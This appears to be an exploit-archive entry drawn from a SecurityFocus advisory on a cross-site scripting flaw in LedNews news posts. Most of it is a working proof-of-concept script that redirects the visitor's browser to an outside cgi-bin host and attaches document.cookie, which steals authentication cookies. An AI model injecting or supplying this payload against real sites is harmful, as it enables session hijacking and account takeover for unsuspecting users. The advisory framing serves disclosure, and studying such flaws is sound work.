7 lines
No EOL
373 B
Text
7 lines
No EOL
373 B
Text
source: https://www.securityfocus.com/bid/7920/info
|
|
|
|
It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities.
|
|
|
|
<script>
|
|
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
|
|
</script> |